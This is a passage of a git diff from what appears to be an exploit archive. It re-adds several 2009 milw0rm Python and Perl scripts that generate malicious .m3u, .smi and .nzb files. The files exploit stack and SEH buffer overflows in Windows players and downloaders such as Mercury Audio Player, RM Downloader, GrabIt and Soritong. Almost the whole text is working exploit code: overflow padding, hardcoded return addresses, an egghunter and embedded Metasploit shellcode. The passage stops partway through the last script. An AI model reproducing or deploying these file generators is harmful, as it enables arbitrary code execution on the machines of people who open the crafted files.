+"\xe9\xa3\x10\xc2\xd3\x35\xdf\x32\x9d\x84\x70\x69\xcc\x60\x10\x50"
+"\x63\x6d\xb0\xbd\xb7\x7d\xfa\xdd\x63\x7d\x70\x37\x03\xe8\xa7\x12"
+"\xec\xa2\xca\xf6\x8c\xea\xbb\x06\x6d\xa1\x83\x3a\x63\x21\xf7\xbd"
+"\x98\x7d\x56\xbd\x80\x69\x10\x3f\x63\xe1\x4b\x36\xe8\x61\x70\x5e"
+"\xd4\x3e\xca\xc0\x88\x37\x72\xce\x6b\xa1\x80\x66\x80\x91\x71\x32"
+"\xb7\x09\x63\xc8\x62\x6f\xac\xc9\x0f\x02\x9a\x5a\x8b\x61\xfb\x36")
+
+exploit = header1 + buff + next_seh + seh + shellcode + junk + header2
+
+try:
+    out_file = open("exploit.pls",'w')
+    out_file.write(exploit)
+    out_file.close()
+    raw_input("\nExploit file created!\n")
+except:
+    print "Error"
+
+# milw0rm.com [2009-04-30]
diff --git a/platforms/windows/local/8583.py b/platforms/windows/local/8583.py
index 021624108..826f183ba 100755
--- a/platforms/windows/local/8583.py
+++ b/platforms/windows/local/8583.py
@@ -1,53 +1,53 @@
-#usage: exploit.py
-#Note : Exploit take about 30 seconds to work.
-print "**************************************************************************"
-print " Mercury Audio Player 1.21 (.m3u) Seh Overwrite Exploit\n"
-print " Refer: http://www.milw0rm.com/exploits/8578"
-print " Exploit code: His0k4"
-print " Tested on: Windows XP Pro SP3 (EN)\n"
-print " greetz: TO ELITE ALGERIANS (TixxDZ),snakespc.com\n"
-print "**************************************************************************"
-
-         	
-buff = "\x41" * 16740
-next_seh = "\xEB\x06\x41\x42"
-seh = "\xB8\x15\xD1\x72" #msacm32.drv
-
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=158 Encoder=PexFnstenvMov http://metasploit.com
-shellcode = (
-"DZ27DZ27"+"\x90\x90\x90\x90\x90\x90\x90\x90"
-"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x22\xd1\xdc"
-"\x59\x83\xeb\xfc\xe2\xf4\xde\x39\x98\x59\x22\xd1\x57\x1c\x1e\x5a"
-"\xa0\x5c\x5a\xd0\x33\xd2\x6d\xc9\x57\x06\x02\xd0\x37\x10\xa9\xe5"
-"\x57\x58\xcc\xe0\x1c\xc0\x8e\x55\x1c\x2d\x25\x10\x16\x54\x23\x13"
-"\x37\xad\x19\x85\xf8\x5d\x57\x34\x57\x06\x06\xd0\x37\x3f\xa9\xdd"
-"\x97\xd2\x7d\xcd\xdd\xb2\xa9\xcd\x57\x58\xc9\x58\x80\x7d\x26\x12"
-"\xed\x99\x46\x5a\x9c\x69\xa7\x11\xa4\x55\xa9\x91\xd0\xd2\x52\xcd"
-"\x71\xd2\x4a\xd9\x37\x50\xa9\x51\x6c\x59\x22\xd1\x57\x31\x1e\x8e"
-"\xed\xaf\x42\x87\x55\xa1\xa1\x11\xa7\x09\x4a\x21\x56\x5d\x7d\xb9"
-"\x44\xa7\xa8\xdf\x8b\xa6\xc5\xb2\xbd\x35\x41\xd1\xdc\x59")
-
-#[*] x86/alpha_mixed succeeded with size 126 (iteration=1)
-egghunter=(
-"\x89\xe5\xda\xd9\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
-"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
-"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
-"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
-"\x45\x36\x4d\x51\x48\x4a\x4b\x4f\x44\x4f\x51\x52\x46\x32\x42"
-"\x4a\x45\x52\x46\x38\x48\x4d\x46\x4e\x47\x4c\x45\x55\x51\x4a"
-"\x44\x34\x4a\x4f\x48\x38\x47\x34\x50\x5a\x50\x32\x50\x37\x4c"
-"\x4b\x4b\x4a\x4e\x4f\x43\x45\x4b\x5a\x4e\x4f\x42\x55\x4b\x57"
-"\x4b\x4f\x4d\x37\x41\x41")
-
-exploit = buff + shellcode + next_seh + seh + egghunter + "\x90"*7
-
-try:
-    out_file = open("exploit.m3u",'w')
-    out_file.write(exploit+".mp3")
-    out_file.close()
-    raw_input("\nExploit file created!\n")
-except:
-    print "Error"
-
-# milw0rm.com [2009-05-01]
+#usage: exploit.py
+#Note : Exploit take about 30 seconds to work.
+print "**************************************************************************"
+print " Mercury Audio Player 1.21 (.m3u) Seh Overwrite Exploit\n"
+print " Refer: http://www.milw0rm.com/exploits/8578"
+print " Exploit code: His0k4"
+print " Tested on: Windows XP Pro SP3 (EN)\n"
+print " greetz: TO ELITE ALGERIANS (TixxDZ),snakespc.com\n"
+print "**************************************************************************"
+
+         	
+buff = "\x41" * 16740
+next_seh = "\xEB\x06\x41\x42"
+seh = "\xB8\x15\xD1\x72" #msacm32.drv
+
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=158 Encoder=PexFnstenvMov http://metasploit.com
+shellcode = (
+"DZ27DZ27"+"\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x22\xd1\xdc"
+"\x59\x83\xeb\xfc\xe2\xf4\xde\x39\x98\x59\x22\xd1\x57\x1c\x1e\x5a"
+"\xa0\x5c\x5a\xd0\x33\xd2\x6d\xc9\x57\x06\x02\xd0\x37\x10\xa9\xe5"
+"\x57\x58\xcc\xe0\x1c\xc0\x8e\x55\x1c\x2d\x25\x10\x16\x54\x23\x13"
+"\x37\xad\x19\x85\xf8\x5d\x57\x34\x57\x06\x06\xd0\x37\x3f\xa9\xdd"
+"\x97\xd2\x7d\xcd\xdd\xb2\xa9\xcd\x57\x58\xc9\x58\x80\x7d\x26\x12"
+"\xed\x99\x46\x5a\x9c\x69\xa7\x11\xa4\x55\xa9\x91\xd0\xd2\x52\xcd"
+"\x71\xd2\x4a\xd9\x37\x50\xa9\x51\x6c\x59\x22\xd1\x57\x31\x1e\x8e"
+"\xed\xaf\x42\x87\x55\xa1\xa1\x11\xa7\x09\x4a\x21\x56\x5d\x7d\xb9"
+"\x44\xa7\xa8\xdf\x8b\xa6\xc5\xb2\xbd\x35\x41\xd1\xdc\x59")
+
+#[*] x86/alpha_mixed succeeded with size 126 (iteration=1)
+egghunter=(
+"\x89\xe5\xda\xd9\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x45\x36\x4d\x51\x48\x4a\x4b\x4f\x44\x4f\x51\x52\x46\x32\x42"
+"\x4a\x45\x52\x46\x38\x48\x4d\x46\x4e\x47\x4c\x45\x55\x51\x4a"
+"\x44\x34\x4a\x4f\x48\x38\x47\x34\x50\x5a\x50\x32\x50\x37\x4c"
+"\x4b\x4b\x4a\x4e\x4f\x43\x45\x4b\x5a\x4e\x4f\x42\x55\x4b\x57"
+"\x4b\x4f\x4d\x37\x41\x41")
+
+exploit = buff + shellcode + next_seh + seh + egghunter + "\x90"*7
+
+try:
+    out_file = open("exploit.m3u",'w')
+    out_file.write(exploit+".mp3")
+    out_file.close()
+    raw_input("\nExploit file created!\n")
+except:
+    print "Error"
+
+# milw0rm.com [2009-05-01]
diff --git a/platforms/windows/local/8589.py b/platforms/windows/local/8589.py
index 08d90ee4d..5962c0fd8 100755
--- a/platforms/windows/local/8589.py
+++ b/platforms/windows/local/8589.py
@@ -1,37 +1,37 @@
-#usage: exploit.py
-print "**************************************************************************"
-print " RM Downloader (.smi) Local Stack Overflow\n"
-print " Exploit code: ThE g0bL!N"
-print " Tested on: Windows XP Pro SP3 (EN)\n"
-print " greetz: His0k4 Dos-Dz TeaM-Snakes Team and all My friend\n"
-print "**************************************************************************"
-                     
-buff = "\x41" * 26083
-jump = "\x5D\x38\x82\x7C" # jmp esp kernel32.dll
-nops = "\x90"*6
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-shellcode = (
-"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x4b"
-"\x1d\xa3\xb6\x83\xeb\xfc\xe2\xf4\xb7\xf5\xe7\xb6\x4b\x1d\x28\xf3"
-"\x77\x96\xdf\xb3\x33\x1c\x4c\x3d\x04\x05\x28\xe9\x6b\x1c\x48\xff"
-"\xc0\x29\x28\xb7\xa5\x2c\x63\x2f\xe7\x99\x63\xc2\x4c\xdc\x69\xbb"
-"\x4a\xdf\x48\x42\x70\x49\x87\xb2\x3e\xf8\x28\xe9\x6f\x1c\x48\xd0"
-"\xc0\x11\xe8\x3d\x14\x01\xa2\x5d\xc0\x01\x28\xb7\xa0\x94\xff\x92"
-"\x4f\xde\x92\x76\x2f\x96\xe3\x86\xce\xdd\xdb\xba\xc0\x5d\xaf\x3d"
-"\x3b\x01\x0e\x3d\x23\x15\x48\xbf\xc0\x9d\x13\xb6\x4b\x1d\x28\xde"
-"\x77\x42\x92\x40\x2b\x4b\x2a\x4e\xc8\xdd\xd8\xe6\x23\xed\x29\xb2"
-"\x14\x75\x3b\x48\xc1\x13\xf4\x49\xac\x7e\xc2\xda\x28\x1d\xa3\xb6")
-
-
-exploit = buff + jump + nops + shellcode
-
-try:
-    out_file = open("exploit.smi",'w')
-    out_file.write(exploit+"\r\n")
-    out_file.close()
-    raw_input("\nExploit file created!\n")
-except:
-    print "Error"
-
-# milw0rm.com [2009-05-01]
+#usage: exploit.py
+print "**************************************************************************"
+print " RM Downloader (.smi) Local Stack Overflow\n"
+print " Exploit code: ThE g0bL!N"
+print " Tested on: Windows XP Pro SP3 (EN)\n"
+print " greetz: His0k4 Dos-Dz TeaM-Snakes Team and all My friend\n"
+print "**************************************************************************"
+                     
+buff = "\x41" * 26083
+jump = "\x5D\x38\x82\x7C" # jmp esp kernel32.dll
+nops = "\x90"*6
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+shellcode = (
+"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x4b"
+"\x1d\xa3\xb6\x83\xeb\xfc\xe2\xf4\xb7\xf5\xe7\xb6\x4b\x1d\x28\xf3"
+"\x77\x96\xdf\xb3\x33\x1c\x4c\x3d\x04\x05\x28\xe9\x6b\x1c\x48\xff"
+"\xc0\x29\x28\xb7\xa5\x2c\x63\x2f\xe7\x99\x63\xc2\x4c\xdc\x69\xbb"
+"\x4a\xdf\x48\x42\x70\x49\x87\xb2\x3e\xf8\x28\xe9\x6f\x1c\x48\xd0"
+"\xc0\x11\xe8\x3d\x14\x01\xa2\x5d\xc0\x01\x28\xb7\xa0\x94\xff\x92"
+"\x4f\xde\x92\x76\x2f\x96\xe3\x86\xce\xdd\xdb\xba\xc0\x5d\xaf\x3d"
+"\x3b\x01\x0e\x3d\x23\x15\x48\xbf\xc0\x9d\x13\xb6\x4b\x1d\x28\xde"
+"\x77\x42\x92\x40\x2b\x4b\x2a\x4e\xc8\xdd\xd8\xe6\x23\xed\x29\xb2"
+"\x14\x75\x3b\x48\xc1\x13\xf4\x49\xac\x7e\xc2\xda\x28\x1d\xa3\xb6")
+
+
+exploit = buff + jump + nops + shellcode
+
+try:
+    out_file = open("exploit.smi",'w')
+    out_file.write(exploit+"\r\n")
+    out_file.close()
+    raw_input("\nExploit file created!\n")
+except:
+    print "Error"
+
+# milw0rm.com [2009-05-01]
diff --git a/platforms/windows/local/8594.pl b/platforms/windows/local/8594.pl
index 4f81ecdd5..0971e2d4f 100755
--- a/platforms/windows/local/8594.pl
+++ b/platforms/windows/local/8594.pl
@@ -1,25 +1,25 @@
-#!/usr/bin/perl
-# RM Downloader (.smi File) Universal Overflow Exploit
-use strict;
-use warnings;
-my $shellcode =
-"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x4b".
-"\x1d\xa3\xb6\x83\xeb\xfc\xe2\xf4\xb7\xf5\xe7\xb6\x4b\x1d\x28\xf3".
-"\x77\x96\xdf\xb3\x33\x1c\x4c\x3d\x04\x05\x28\xe9\x6b\x1c\x48\xff".
-"\xc0\x29\x28\xb7\xa5\x2c\x63\x2f\xe7\x99\x63\xc2\x4c\xdc\x69\xbb".
-"\x4a\xdf\x48\x42\x70\x49\x87\xb2\x3e\xf8\x28\xe9\x6f\x1c\x48\xd0".
-"\xc0\x11\xe8\x3d\x14\x01\xa2\x5d\xc0\x01\x28\xb7\xa0\x94\xff\x92".
-"\x4f\xde\x92\x76\x2f\x96\xe3\x86\xce\xdd\xdb\xba\xc0\x5d\xaf\x3d".
-"\x3b\x01\x0e\x3d\x23\x15\x48\xbf\xc0\x9d\x13\xb6\x4b\x1d\x28\xde".
-"\x77\x42\x92\x40\x2b\x4b\x2a\x4e\xc8\xdd\xd8\xe6\x23\xed\x29\xb2".
-"\x14\x75\x3b\x48\xc1\x13\xf4\x49\xac\x7e\xc2\xda\x28\x1d\xa3\xb6";
-my $junk = "\x41" x 26076;
-my $eip  = "\x17\x48\xF8\x01"; # Universall Ret Adress
-my $nops = "\x90" x 24;
-open(my $playlist, "> spl.smi");
-print $playlist
-                    $junk.$eip.$nops.$shellcode.$junk.
-                    "\r\n";
-close $playlist;
-
-# milw0rm.com [2009-05-01]
+#!/usr/bin/perl
+# RM Downloader (.smi File) Universal Overflow Exploit
+use strict;
+use warnings;
+my $shellcode =
+"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x4b".
+"\x1d\xa3\xb6\x83\xeb\xfc\xe2\xf4\xb7\xf5\xe7\xb6\x4b\x1d\x28\xf3".
+"\x77\x96\xdf\xb3\x33\x1c\x4c\x3d\x04\x05\x28\xe9\x6b\x1c\x48\xff".
+"\xc0\x29\x28\xb7\xa5\x2c\x63\x2f\xe7\x99\x63\xc2\x4c\xdc\x69\xbb".
+"\x4a\xdf\x48\x42\x70\x49\x87\xb2\x3e\xf8\x28\xe9\x6f\x1c\x48\xd0".
+"\xc0\x11\xe8\x3d\x14\x01\xa2\x5d\xc0\x01\x28\xb7\xa0\x94\xff\x92".
+"\x4f\xde\x92\x76\x2f\x96\xe3\x86\xce\xdd\xdb\xba\xc0\x5d\xaf\x3d".
+"\x3b\x01\x0e\x3d\x23\x15\x48\xbf\xc0\x9d\x13\xb6\x4b\x1d\x28\xde".
+"\x77\x42\x92\x40\x2b\x4b\x2a\x4e\xc8\xdd\xd8\xe6\x23\xed\x29\xb2".
+"\x14\x75\x3b\x48\xc1\x13\xf4\x49\xac\x7e\xc2\xda\x28\x1d\xa3\xb6";
+my $junk = "\x41" x 26076;
+my $eip  = "\x17\x48\xF8\x01"; # Universall Ret Adress
+my $nops = "\x90" x 24;
+open(my $playlist, "> spl.smi");
+print $playlist
+                    $junk.$eip.$nops.$shellcode.$junk.
+                    "\r\n";
+close $playlist;
+
+# milw0rm.com [2009-05-01]
diff --git a/platforms/windows/local/8612.pl b/platforms/windows/local/8612.pl
index 475183362..2a814e4ea 100755
--- a/platforms/windows/local/8612.pl
+++ b/platforms/windows/local/8612.pl
@@ -1,36 +1,36 @@
-#!/usr/bin/perl
-# Grabit<=1.7.2 Beta 3 (.nzb) SEH Overwrite Exploit
-# Coded by: Gaurav Baruah
-# Discovery: Niels Teusink
-#http://packetstormsecurity.org/filedesc/grabit-overflow.txt.html
-# Greetz to Vivek
-#Tested on XP SP3 and XP SP2 (en)
-my $header1=
-"<?xml version=\"1.0\"?>
-<!DOCTYPE nzb
-  PUBLIC \"-//newzBin//DTD NZB 1.0//EN\"
-         \"";
-
-my $shellcode=
-"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8".
-"\x61\xfb\x36\x83\xeb\xfc\xe2\xf4\x14\x89\xbf\x36\xe8\x61\x70\x73".
-"\xd4\xea\x87\x33\x90\x60\x14\xbd\xa7\x79\x70\x69\xc8\x60\x10\x7f".
-"\x63\x55\x70\x37\x06\x50\x3b\xaf\x44\xe5\x3b\x42\xef\xa0\x31\x3b".
-"\xe9\xa3\x10\xc2\xd3\x35\xdf\x32\x9d\x84\x70\x69\xcc\x60\x10\x50".
-"\x63\x6d\xb0\xbd\xb7\x7d\xfa\xdd\x63\x7d\x70\x37\x03\xe8\xa7\x12".
-"\xec\xa2\xca\xf6\x8c\xea\xbb\x06\x6d\xa1\x83\x3a\x63\x21\xf7\xbd".
-"\x98\x7d\x56\xbd\x80\x69\x10\x3f\x63\xe1\x4b\x36\xe8\x61\x70\x5e".
-"\xd4\x3e\xca\xc0\x88\x37\x72\xce\x6b\xa1\x80\x66\x80\x91\x71\x32".
-"\xb7\x09\x63\xc8\x62\x6f\xac\xc9\x0f\x02\x9a\x5a\x8b\x61\xfb\x36";
-
-my $next_seh = "\xEB\x06\x90\x90";
-my $seh = "\xE5\x56\x01\x10" ;   #libeay32.dll
-my $file = "test.nzb";
-
-open (nzb, ">./$file") || die "\nCan't open $file: $!";
-print nzb "$header1" . "\x41" x 248 . "$next_seh" . "$seh" . "$shellcode";
-close (nzb);
-sleep 1;
-print "\nFile $file successfully created!\n";
-
-# milw0rm.com [2009-05-05]
+#!/usr/bin/perl
+# Grabit<=1.7.2 Beta 3 (.nzb) SEH Overwrite Exploit
+# Coded by: Gaurav Baruah
+# Discovery: Niels Teusink
+#http://packetstormsecurity.org/filedesc/grabit-overflow.txt.html
+# Greetz to Vivek
+#Tested on XP SP3 and XP SP2 (en)
+my $header1=
+"<?xml version=\"1.0\"?>
+<!DOCTYPE nzb
+  PUBLIC \"-//newzBin//DTD NZB 1.0//EN\"
+         \"";
+
+my $shellcode=
+"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8".
+"\x61\xfb\x36\x83\xeb\xfc\xe2\xf4\x14\x89\xbf\x36\xe8\x61\x70\x73".
+"\xd4\xea\x87\x33\x90\x60\x14\xbd\xa7\x79\x70\x69\xc8\x60\x10\x7f".
+"\x63\x55\x70\x37\x06\x50\x3b\xaf\x44\xe5\x3b\x42\xef\xa0\x31\x3b".
+"\xe9\xa3\x10\xc2\xd3\x35\xdf\x32\x9d\x84\x70\x69\xcc\x60\x10\x50".
+"\x63\x6d\xb0\xbd\xb7\x7d\xfa\xdd\x63\x7d\x70\x37\x03\xe8\xa7\x12".
+"\xec\xa2\xca\xf6\x8c\xea\xbb\x06\x6d\xa1\x83\x3a\x63\x21\xf7\xbd".
+"\x98\x7d\x56\xbd\x80\x69\x10\x3f\x63\xe1\x4b\x36\xe8\x61\x70\x5e".
+"\xd4\x3e\xca\xc0\x88\x37\x72\xce\x6b\xa1\x80\x66\x80\x91\x71\x32".
+"\xb7\x09\x63\xc8\x62\x6f\xac\xc9\x0f\x02\x9a\x5a\x8b\x61\xfb\x36";
+
+my $next_seh = "\xEB\x06\x90\x90";
+my $seh = "\xE5\x56\x01\x10" ;   #libeay32.dll
+my $file = "test.nzb";
+
+open (nzb, ">./$file") || die "\nCan't open $file: $!";
+print nzb "$header1" . "\x41" x 248 . "$next_seh" . "$seh" . "$shellcode";
+close (nzb);
+sleep 1;
+print "\nFile $file successfully created!\n";
+
+# milw0rm.com [2009-05-05]
diff --git a/platforms/windows/local/8620.pl b/platforms/windows/local/8620.pl
index 1fd225035..dab92e14a 100755
--- a/platforms/windows/local/8620.pl
+++ b/platforms/windows/local/8620.pl
@@ -1,41 +1,41 @@
-#!/usr/bin/perl
-# Streaming Audio Player 0.9 (.M3U File) Local Stack Core Exploit
-# Credit : http://www.milw0rm.com/exploits/8617 cyber-zone
-# By Stack
-# Tested On WinSp2 En / FR
-use strict;
-use warnings;
-my $header= "\x23\x45\x58\x54\x4D\x33\x55\x0D\x68\x74\x74\x70\x3A\x2F\x2F";
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
-"\x4e\x46\x43\x36\x42\x50\x5a";
-my $junk = "\x41" x 512;
-my $eip  = "\xD7\x98\x95\x7C";
-my $nops = "\x90" x 24;
-open(my $playlist, "> spl.m3u");
-print $playlist
-                    $junk.$eip.$nops.$shellcode.
-                    "\r\n";
-close $playlist;
-
-# milw0rm.com [2009-05-05]
+#!/usr/bin/perl
+# Streaming Audio Player 0.9 (.M3U File) Local Stack Core Exploit
+# Credit : http://www.milw0rm.com/exploits/8617 cyber-zone
+# By Stack
+# Tested On WinSp2 En / FR
+use strict;
+use warnings;
+my $header= "\x23\x45\x58\x54\x4D\x33\x55\x0D\x68\x74\x74\x70\x3A\x2F\x2F";
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
+"\x4e\x46\x43\x36\x42\x50\x5a";
+my $junk = "\x41" x 512;
+my $eip  = "\xD7\x98\x95\x7C";
+my $nops = "\x90" x 24;
+open(my $playlist, "> spl.m3u");
+print $playlist
+                    $junk.$eip.$nops.$shellcode.
+                    "\r\n";
+close $playlist;
+
+# milw0rm.com [2009-05-05]
diff --git a/platforms/windows/local/8624.pl b/platforms/windows/local/8624.pl
index a6c52e3aa..c54d2b831 100755
--- a/platforms/windows/local/8624.pl
+++ b/platforms/windows/local/8624.pl
@@ -1,40 +1,40 @@
-#!/usr/bin/perl
-# Soritong MP3 Player 1.0 Seh Overwrite Exploit
-# http://www.sorinara.com/soritong/soritong10.exe
-use strict;
-use warnings;
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
-"\x4e\x46\x43\x36\x42\x50\x5a";
-my $junk = "\x41" x 260;
-my $next_seh="\xeb\x06\x90\x90";
-my $seh  = "\x44\x25\xD1\x72"; #
-my $nops = "\x90" x 50;
-my $nopsled = "\x90" x 20;
-open(my $playlist, "> seh_exploit.m3u");
-print $playlist
-                    $junk.$next_seh.$seh.$nops.$shellcode.$nopsled.
-                    "\r\n";
-close $playlist;
-
-# milw0rm.com [2009-05-07]
+#!/usr/bin/perl
+# Soritong MP3 Player 1.0 Seh Overwrite Exploit
+# http://www.sorinara.com/soritong/soritong10.exe
+use strict;
+use warnings;
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
